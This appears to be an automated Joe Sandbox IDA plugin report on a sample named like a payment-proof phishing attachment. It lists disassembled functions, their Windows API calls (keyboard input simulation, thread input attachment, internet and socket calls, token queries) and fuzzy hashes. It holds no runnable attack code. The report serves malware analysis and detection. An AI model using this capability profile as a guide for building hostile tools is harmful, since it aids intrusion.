Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: e99b0c5625bb961286b3ddf10def8418b8e5e6ebec6e1999f41b1102eaf82a2f
Instruction ID: 6627d63f14f4c13ce14e681dfc313b6a7abf2eb9ba76b47a5729f106a82ac3b6
Opcode Fuzzy Hash: e99b0c5625bb961286b3ddf10def8418b8e5e6ebec6e1999f41b1102eaf82a2f
Instruction Fuzzy Hash: 4541D671A00749AFDF21DF59CC51BEE7BB9AF48710F040019F905A7281DB789A46AFD1

Function 00FF390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00FF3966
SetKeyboardState.USER32(00000080,?,00000001), ref: 00FF3982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00FF39EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00FF3A4D

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 56a02f71302eca6068f31fd55a9014bcb573e51613859effa38481e0c2413ebe
Instruction ID: 3c17ed8f5560c553b007d3fa2e54b59d4818bb464268593c3d6a67e5a4dc3a6b
Opcode Fuzzy Hash: 56a02f71302eca6068f31fd55a9014bcb573e51613859effa38481e0c2413ebe
Instruction Fuzzy Hash: A0412771E0424CAAEF308B658805BFDBBBA9F45320F04015AF6C1962E1C7F98E85F765

Function 00FFE698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00FFE742
GetLastError.KERNEL32(?,00000000), ref: 00FFE768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00FFE78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00FFE7B9

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: d24caac66f9b8a8d22d9169eb6458231128c27022bde61ff29a3b0325fbd8330
Instruction ID: c8f2655b31b327f8278a744b7bed1c2ccf227ddaf337b177b7d6f44c15782c4a
Opcode Fuzzy Hash: d24caac66f9b8a8d22d9169eb6458231128c27022bde61ff29a3b0325fbd8330
Instruction Fuzzy Hash: E1414A35604614DFCB11EF15C945A5DBBE5BF59720B088098EA569B372CB78FC00EF81

Function 0101B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0101B5D1

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 96530290fedcccfe94c2eb58c90bc674cd82dfcf4198d15587f34550803504f7
Instruction ID: d96eb73514bccff46e75ae199624bf6a4a276d36e2e03e951339e34aff9c1043
Opcode Fuzzy Hash: 96530290fedcccfe94c2eb58c90bc674cd82dfcf4198d15587f34550803504f7
Instruction Fuzzy Hash: BA31DC34601208ABEB319F5CC889FAC3BB9AB59350F944945FAD1D62E9CB3DA5408B51

Function 0101D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0101D807
GetWindowRect.USER32(?,?), ref: 0101D87D
PtInRect.USER32(?,?,0101ED5A), ref: 0101D88D
MessageBeep.USER32(00000000), ref: 0101D8FE

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: bce92d7b1bcb8cbac42be07cbe6199fe7aec3cfce27a8fe40b1db38fb6df1c88
Instruction ID: ee26a0d9e217e175040b8cc763a73f49f14d2fa1db55decb89f7af46b699d35c
Opcode Fuzzy Hash: bce92d7b1bcb8cbac42be07cbe6199fe7aec3cfce27a8fe40b1db38fb6df1c88
Instruction Fuzzy Hash: AE41AD70A00219DFDB22DF98C488BAD7BF5FF48314F1881A9E9989B299D339E541CB50

Function 00FF3A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00FF3AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00FF3AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00FF3B34
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00FF3B92

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: b199b5f09259133611fad77d954515799afa346b7f01a826c568fd7f8e6ebeeb
Instruction ID: 6ce582c308632d187dc10a1e29a45a2f9799d42fe4e79a6182d2ded8dd1efd59
Opcode Fuzzy Hash: b199b5f09259133611fad77d954515799afa346b7f01a826c568fd7f8e6ebeeb
Instruction Fuzzy Hash: 57310771E0025CAEEF318B6488297FE7BA99F95320F04015AE781A72E1C7798F45F761

Function 00FE4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FE4038
__isleadbyte_l.LIBCMT ref: 00FE4066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00FE4094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00FE40CA

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: d5fbb85a4905db866399c9b4ba17232573266d37c9fcda83bdbb7972f43dfb09
Instruction ID: 93412b1e2ca782eb3a5037e8a55a3e4ff340cb0e9230cbdeae94024cf58f6686
Opcode Fuzzy Hash: d5fbb85a4905db866399c9b4ba17232573266d37c9fcda83bdbb7972f43dfb09
Instruction Fuzzy Hash: 2D31A131A00286AFDB219F66CC44B6A7BA9BF40320F15443DE7658B191E731F890E790

Function 01017CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 01017CB9

Part of subcall function 00FF5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FF5F6F
Part of subcall function 00FF5F55: GetCurrentThreadId.KERNEL32 ref: 00FF5F76
Part of subcall function 00FF5F55: AttachThreadInput.USER32(00000000,?,00FF781F), ref: 00FF5F7D

GetCaretPos.USER32(?), ref: 01017CCA
ClientToScreen.USER32(00000000,?), ref: 01017D03
GetForegroundWindow.USER32 ref: 01017D09

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 276ab0632981071ca4d3964bcda8c1820011c279f812deee39fee4da4df079c6
Instruction ID: f331b450ef01476563aed79b8270eec1fad3814934c62e770e5dbb8b52db4d54
Opcode Fuzzy Hash: 276ab0632981071ca4d3964bcda8c1820011c279f812deee39fee4da4df079c6
Instruction Fuzzy Hash: 9E313C72900109AFDB10EFA9CD81DEFBBFDEF58310F10806AE855E3211DA359E019BA0

Function 0101F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FCB34E: GetWindowLongW.USER32(?,000000EB), ref: 00FCB35F

GetCursorPos.USER32(?), ref: 0101F211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0102E4C0,?,?,?,?,?), ref: 0101F226
GetCursorPos.USER32(?), ref: 0101F270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0102E4C0,?,?,?), ref: 0101F2A6

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 6dd86ec9734732c3c4813210df3629fa8c88def54c03fef8dfa60312cf2eea5f
Instruction ID: 5d5ffe8fd8a1c99bcd257e71941de4aeda9db8ef419f727be06386910ae9529f
Opcode Fuzzy Hash: 6dd86ec9734732c3c4813210df3629fa8c88def54c03fef8dfa60312cf2eea5f
Instruction Fuzzy Hash: A721E139500028AFDB268F98C849EEE7FB9FF0A714F048099FA85872D9D3799950DB50

Function 0100431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01004358

Part of subcall function 010043E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 01004401
Part of subcall function 010043E2: InternetCloseHandle.WININET(00000000), ref: 0100449E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 23ba9d5d121c14a657697484f85f5f960bce7fb16d53062476203e917b7889f0
Instruction ID: bb2e7bd882ef7bce5a9200e9972303115437e1cf14f713276980c29a26ed27cf
Opcode Fuzzy Hash: 23ba9d5d121c14a657697484f85f5f960bce7fb16d53062476203e917b7889f0
Instruction Fuzzy Hash: 84219F75600A05BBFB239F649C40FBBBBEDFF44610F00901ABB95D6680EB7294219B94

Function 01018A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 01018AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 01018AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 01018ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 01018ADC

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 82da698d193b4e710df0fdac70cabd86eaaa782dc5efa77f2ca70552b9b7bc57
Instruction ID: be8b5bcd570401a58b76d161014f255d9ab73e61c960f27aa83af58bf08dd32c
Opcode Fuzzy Hash: 82da698d193b4e710df0fdac70cabd86eaaa782dc5efa77f2ca70552b9b7bc57
Instruction Fuzzy Hash: D211D032205111AFE754AB28CC05FBE779DEF85320F58811AF956C72E1CB69AD008B90

Function 01008A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 01008AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 01008AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 01008AFF
WSAGetLastError.WSOCK32(00000000), ref: 01008B16

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 0d8d09a656e887df5c1475de2e69fc79199b58d774ebda6ffa894bda3fbfcd19
Instruction ID: b1541723406795ece9dd09f48c45bd0e454a62e0d5db14577c280d21b2b5b7f6
Opcode Fuzzy Hash: 0d8d09a656e887df5c1475de2e69fc79199b58d774ebda6ffa894bda3fbfcd19
Instruction Fuzzy Hash: 45219372A001249FD721DF69CD85A9EBBECFF49310F0081AAF849D7280DB789A418F90

Function 00FF0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00FF1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00FF0ABB,?,?,?,00FF187A,00000000,000000EF,00000119,?,?), ref: 00FF1E77
Part of subcall function 00FF1E68: lstrcpyW.KERNEL32(00000000,?,?,00FF0ABB,?,?,?,00FF187A,00000000,000000EF,00000119,?,?,00000000), ref: 00FF1E9D
Part of subcall function 00FF1E68: lstrcmpiW.KERNEL32(00000000,?,00FF0ABB,?,?,?,00FF187A,00000000,000000EF,00000119,?,?), ref: 00FF1ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00FF187A,00000000,000000EF,00000119,?,?,00000000), ref: 00FF0AD4
lstrcpyW.KERNEL32(00000000,?,?,00FF187A,00000000,000000EF,00000119,?,?,00000000), ref: 00FF0AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,00FF187A,00000000,000000EF,00000119,?,?,00000000), ref: 00FF0B2E

Strings

cdecl, xrefs: 00FF0B25

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: f83b259b8fb9f2821951640de96a3967c899cfe5a5c1b8b4c766445a038b34a1
Instruction ID: 91e9160018343b570aec4d67d7ef981e5ced2b4404871fd9430d8723e048d108
Opcode Fuzzy Hash: f83b259b8fb9f2821951640de96a3967c899cfe5a5c1b8b4c766445a038b34a1
Instruction Fuzzy Hash: B311E936200309EFDB259F74DC05E7A77A9FF85314B80402AFA06CB265EF719850E7A0

Function 00FE2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00FE2FB5

Part of subcall function 00FD395C: __FF_MSGBANNER.LIBCMT ref: 00FD3973
Part of subcall function 00FD395C: __NMSG_WRITE.LIBCMT ref: 00FD397A
Part of subcall function 00FD395C: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000001,00000000,?,?,00FCF507,?,0000000E), ref: 00FD399F

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 4f410b34961dbb7ab21c8c5a1d193a0c42eca88fb067dff0323784374a93f91a
Instruction ID: a58ed5fab2369af4711c484be2b7b255d7ff5f8091bed58b8a757d6f5a652c4a
Opcode Fuzzy Hash: 4f410b34961dbb7ab21c8c5a1d193a0c42eca88fb067dff0323784374a93f91a
Instruction Fuzzy Hash: F5110A32909351AFDB313F75AC0966A3B9AAF00374F244926F9499B245EB39CD40BB90

Function 00FF058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00FF05AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00FF05C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00FF05DD
FreeLibrary.KERNEL32(?), ref: 00FF0632

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: fafafe14a3ab7a3fbccd14e5fdff71c9bc8d64175988a1eebf6ceb37221f60ca
Instruction ID: 40e5c4f3c6b0f5d32887f38e785594945d26e92eda63bd68619e2697c8f48c21
Opcode Fuzzy Hash: fafafe14a3ab7a3fbccd14e5fdff71c9bc8d64175988a1eebf6ceb37221f60ca
Instruction Fuzzy Hash: 57218E7290020DEFDB208F91DC88AEABBBCEF40700F108469E656D2161DFB5EA55EF50

Function 00FF6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00FF6733
_memset.LIBCMT ref: 00FF6754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00FF67A6
CloseHandle.KERNEL32(00000000), ref: 00FF67AF

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: d4192f371b69b474d9c1fa596c36cd0b7de882ce0bfdde43f01fb53874ac18b9
Instruction ID: 8edecca12847c805a66614431f308e7f30e40e378030fd21a255e4e92bac5bb8
Opcode Fuzzy Hash: d4192f371b69b474d9c1fa596c36cd0b7de882ce0bfdde43f01fb53874ac18b9
Instruction Fuzzy Hash: CB110A76D01228BAE73067A5AC4DFABBABCEF44724F10419AF504E71C0D6744E808B64

Function 00FEB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FEAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FEAA79
Part of subcall function 00FEAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FEAA83
Part of subcall function 00FEAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FEAA92
Part of subcall function 00FEAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FEAA99
Part of subcall function 00FEAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FEAAAF

GetLengthSid.ADVAPI32(?,00000000,00FEADE4,?,?), ref: 00FEB21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FEB227
HeapAlloc.KERNEL32(00000000), ref: 00FEB22E
CopySid.ADVAPI32(?,00000000,?), ref: 00FEB247

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: 2ae94bb713b625aca9193bda1e762b9bd979cdd88ca6c3f0f69afd332972a4a8
Instruction ID: 4f744c63a21bc9324e814bad95914cfb3cb6b54f200380bd33be210989f1cb30
Opcode Fuzzy Hash: 2ae94bb713b625aca9193bda1e762b9bd979cdd88ca6c3f0f69afd332972a4a8
Instruction Fuzzy Hash: 6C11C171A01205FFCB159FA5DD84AAFB7ADEF85314B14802DEA82D7200D735AE44EB10

Function 00FEB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00FEB498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FEB4AA
